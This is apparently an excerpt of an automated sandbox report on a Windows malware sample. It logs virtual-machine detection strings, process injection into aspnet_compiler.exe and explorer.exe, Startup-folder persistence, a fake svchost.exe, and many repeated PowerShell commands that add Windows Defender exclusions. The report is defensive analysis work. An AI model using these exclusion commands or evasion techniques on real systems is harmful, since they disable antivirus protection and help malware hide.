                Source: RYhdmjjr94.exe, 00000000.00000000.421588081.00000000026C1000.00000004.00000001.sdmpBinary or memory string: VMWARE
                Source: explorer.exe, 00000025.00000000.426042235.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
                Source: RYhdmjjr94.exe, 00000000.00000000.421588081.00000000026C1000.00000004.00000001.sdmpBinary or memory string: qi&C:\WINDOWS\system32\drivers\vmhgfs.sys
                Source: explorer.exe, 00000025.00000000.401671955.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
                Source: RYhdmjjr94.exe, 00000000.00000000.398079222.00000000036C9000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                Source: svchost.exe, 00000008.00000002.590149731.000001AC2D640000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.591121994.00000217B1266000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000002.590853707.0000011227029000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: RYhdmjjr94.exe, 00000000.00000000.398079222.00000000036C9000.00000004.00000001.sdmpBinary or memory string: VMWAREESOFTWARE\VMware, Inc.\VMware Tools
                Source: explorer.exe, 00000025.00000000.377468561.0000000003710000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                Source: RYhdmjjr94.exe, 00000000.00000000.398079222.00000000036C9000.00000004.00000001.sdmpBinary or memory string: vmware
                Source: RYhdmjjr94.exe, 00000000.00000000.398079222.00000000036C9000.00000004.00000001.sdmpBinary or memory string: VMwareVBoxARun using valid operating system
                Source: RYhdmjjr94.exe, 00000000.00000000.421588081.00000000026C1000.00000004.00000001.sdmpBinary or memory string: qi"SOFTWARE\VMware, Inc.\VMware Tools
                Source: svchost.exe, 00000003.00000002.597488167.0000028F69662000.00000004.00000001.sdmpBinary or memory string: @Hyper-V RAW
                Source: svchost.exe, 00000008.00000002.589926923.000001AC2D602000.00000004.00000001.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                Source: RYhdmjjr94.exe, 00000000.00000000.398079222.00000000036C9000.00000004.00000001.sdmpBinary or memory string: kernel32.dll/wine_get_unix_file_nameQEMU
                Source: explorer.exe, 00000025.00000000.401671955.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
                Source: explorer.exe, 00000025.00000000.381827385.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
                Source: RYhdmjjr94.exe, 00000000.00000000.398079222.00000000036C9000.00000004.00000001.sdmpBinary or memory string: InstallPathKC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\OC:\WINDOWS\system32\drivers\vmmouse.sysMC:\WINDOWS\system32\drivers\vmhgfs.sys
                Source: RYhdmjjr94.exe, 00000000.00000000.421588081.00000000026C1000.00000004.00000001.sdmpBinary or memory string: qi)C:\WINDOWS\system32\drivers\VBoxMouse.sys
                Source: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exeProcess information queried: ProcessInformation
                Source: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exeCode function: 5_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4328 -s 2188
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exeProcess token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess token adjusted: Debug
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\AdvancedRun.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exeProcess token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeMemory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion:

                barindex
                Maps a DLL or memory area into another processShow sources
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
                Allocates memory in foreign processesShow sources
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and write
                Injects a PE file into a foreign processesShow sources
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A
                Adds a directory exclusion to Windows DefenderShow sources
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Writes to foreign memory regionsShow sources
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: A0B008
                .NET source code references suspicious native API functionsShow sources
                Source: RYhdmjjr94.exe, CBBBDD7A/u0033F03D5CC.csReference to suspicious API methods: ('A483E8EF', 'GetProcAddress@kernel32')
                Source: RYhdmjjr94.exe, CBBBDD7A/u00311B6AE82.csReference to suspicious API methods: ('8A214BA7', 'LoadLibraryEx@kernel32.dll')
                Source: RYhdmjjr94.exe, CBBBDD7A/u0039A360D4E.csReference to suspicious API methods: ('C837F2A9', 'VirtualProtect@kernel32')
                Source: 36C95A71.exe.0.dr, CBBBDD7A/u0039A360D4E.csReference to suspicious API methods: ('C837F2A9', 'VirtualProtect@kernel32')
                Source: 36C95A71.exe.0.dr, CBBBDD7A/u00311B6AE82.csReference to suspicious API methods: ('8A214BA7', 'LoadLibraryEx@kernel32.dll')
                Source: 36C95A71.exe.0.dr, CBBBDD7A/u0033F03D5CC.csReference to suspicious API methods: ('A483E8EF', 'GetProcAddress@kernel32')
                Source: svchost.exe.0.dr, CBBBDD7A/u0033F03D5CC.csReference to suspicious API methods: ('A483E8EF', 'GetProcAddress@kernel32')
                Source: svchost.exe.0.dr, CBBBDD7A/u0039A360D4E.csReference to suspicious API methods: ('C837F2A9', 'VirtualProtect@kernel32')
                Source: svchost.exe.0.dr, CBBBDD7A/u00311B6AE82.csReference to suspicious API methods: ('8A214BA7', 'LoadLibraryEx@kernel32.dll')
                Source: 0.0.RYhdmjjr94.exe.1e0000.0.unpack, CBBBDD7A/u0033F03D5CC.csReference to suspicious API methods: ('A483E8EF', 'GetProcAddress@kernel32')
                Source: 0.0.RYhdmjjr94.exe.1e0000.0.unpack, CBBBDD7A/u00311B6AE82.csReference to suspicious API methods: ('8A214BA7', 'LoadLibraryEx@kernel32.dll')
                Source: 0.0.RYhdmjjr94.exe.1e0000.0.unpack, CBBBDD7A/u0039A360D4E.csReference to suspicious API methods: ('C837F2A9', 'VirtualProtect@kernel32')
                Source: 0.0.RYhdmjjr94.exe.1e0000.17.unpack, CBBBDD7A/u00311B6AE82.csReference to suspicious API methods: ('8A214BA7', 'LoadLibraryEx@kernel32.dll')
                Source: 0.0.RYhdmjjr94.exe.1e0000.17.unpack, CBBBDD7A/u0033F03D5CC.csReference to suspicious API methods: ('A483E8EF', 'GetProcAddress@kernel32')
                Source: 0.0.RYhdmjjr94.exe.1e0000.17.unpack, CBBBDD7A/u0039A360D4E.csReference to suspicious API methods: ('C837F2A9', 'VirtualProtect@kernel32')
                Source: 0.0.RYhdmjjr94.exe.1e0000.1.unpack, CBBBDD7A/u00311B6AE82.csReference to suspicious API methods: ('8A214BA7', 'LoadLibraryEx@kernel32.dll')
                Source: 0.0.RYhdmjjr94.exe.1e0000.1.unpack, CBBBDD7A/u0033F03D5CC.csReference to suspicious API methods: ('A483E8EF', 'GetProcAddress@kernel32')
                Source: 0.0.RYhdmjjr94.exe.1e0000.1.unpack, CBBBDD7A/u0039A360D4E.csReference to suspicious API methods: ('C837F2A9', 'VirtualProtect@kernel32')
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
